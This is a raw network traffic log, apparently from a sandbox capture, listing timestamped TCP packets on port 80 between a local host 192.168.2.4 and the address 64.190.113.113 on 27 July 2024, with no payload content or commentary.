Jul 27, 2024 08:54:03.635354996 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.635370016 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635382891 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.635385036 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635405064 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635417938 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.635420084 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635435104 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635436058 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.635448933 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635463953 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635478973 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635484934 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.635493994 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635508060 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635514021 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.635524035 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635538101 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635555029 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.635564089 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635574102 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.635580063 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635595083 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635611057 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635612965 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.635626078 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635641098 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635642052 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.635658026 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635669947 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.635674953 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635690928 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635705948 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635715008 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.635721922 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635737896 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635745049 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.635752916 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635771990 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635777950 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.635787964 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635798931 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.635802984 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635818958 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635834932 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635838032 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.635849953 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635863066 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.635868073 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635883093 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635899067 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635898113 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.635914087 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635926008 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.635929108 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635956049 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635960102 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.635971069 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.635987997 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.636003017 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.636003017 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.636020899 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.636034966 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.636037111 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.636050940 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.636065006 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.636066914 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.636099100 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.636117935 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.636164904 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.641261101 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.641288996 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.641305923 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.641319990 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.641336918 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.641350985 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.641362906 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.641370058 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.641380072 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.641396999 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.641436100 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.641484022 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.641740084 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.641762972 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.641778946 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.641793966 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.641810894 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.641828060 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.641846895 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.641851902 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.641869068 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.641884089 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.641899109 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.641900063 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.641916037 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.641932964 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.641932964 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.641948938 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.641966105 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.641967058 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.641982079 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.641997099 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642003059 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.642013073 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642029047 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642029047 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.642044067 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642056942 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.642059088 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642075062 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642091036 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642091990 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.642106056 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642118931 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.642122030 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642137051 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642151117 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.642154932 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642170906 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642187119 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642189026 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.642210960 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.642227888 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642242908 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642258883 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642272949 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642273903 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.642287970 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642302990 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642306089 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.642327070 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642338037 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.642343998 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642358065 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642374039 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642381907 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.642389059 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642405033 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642405033 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.642420053 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642436028 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642436981 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.642451048 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642467022 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.642467022 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642499924 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.642501116 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642514944 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642537117 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642550945 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.642551899 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642566919 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642580986 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642591953 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.642596006 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642611027 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642616987 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.642626047 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642642021 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642651081 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.642657042 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642673016 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642676115 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.642688036 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642703056 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.642713070 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642729998 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642739058 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.642745018 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642760038 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642775059 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642776012 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.642791033 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642800093 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.642810106 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642832994 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642841101 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.642848015 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642863035 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642877102 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642879009 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.642890930 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642904997 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642915010 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.642920017 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642931938 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.642935991 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642951012 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642963886 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.642967939 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642982006 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642997980 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.642998934 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.643013000 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643022060 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.643028975 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643043995 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643058062 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643073082 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643088102 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643102884 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643107891 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.643143892 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.643163919 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.643203974 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643495083 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643511057 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643524885 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643537998 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643547058 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.643553019 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643567085 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643579960 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643583059 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643584967 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.643585920 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643599033 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643610954 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643618107 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.643623114 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643635988 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643637896 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.643650055 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643662930 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643666983 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.643675089 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643686056 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.643687963 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643707991 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.643707991 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643735886 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.643738031 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643754005 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643769979 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643784046 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.643811941 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.643826008 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643841982 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643857002 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643872023 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643882990 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.643886089 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643902063 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643910885 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.643917084 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643932104 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643948078 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.643949032 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.643973112 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.644053936 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.644076109 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.644090891 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.644105911 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.644114971 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.644120932 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.644131899 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.644138098 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.644154072 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.644166946 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.644167900 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.644182920 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.644196987 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.644203901 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.644212961 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.644222975 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.644227982 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.644243002 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.644256115 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.644258022 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.644273043 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.644284010 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.644289970 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.644304037 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.644304991 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.644320965 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.644324064 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.644335985 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.644349098 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.644351006 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.644367933 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.644383907 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.644406080 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.644642115 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.644656897 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.644680977 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.644694090 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.644706011 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.644711018 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.644726992 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.644740105 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.644741058 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.644782066 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.644818068 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.644834042 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.644849062 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.644865036 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.644865036 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.644881010 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.644892931 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.644896984 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.644912958 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.644927979 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.644936085 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.644953966 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.645052910 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.645068884 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.645085096 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.645102978 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.645133018 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.645231962 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.645256042 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.645273924 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.645289898 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.645306110 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.645307064 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.645324945 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.645339966 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.645343065 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.645354986 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.645365953 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.645370960 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.645394087 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.645401955 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.645411015 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.645426035 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.645438910 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.645442009 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.645457029 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.645469904 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.645473957 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.645489931 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.645498991 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.645504951 CEST	80	50691	64.190.113.113	192.168.2.4
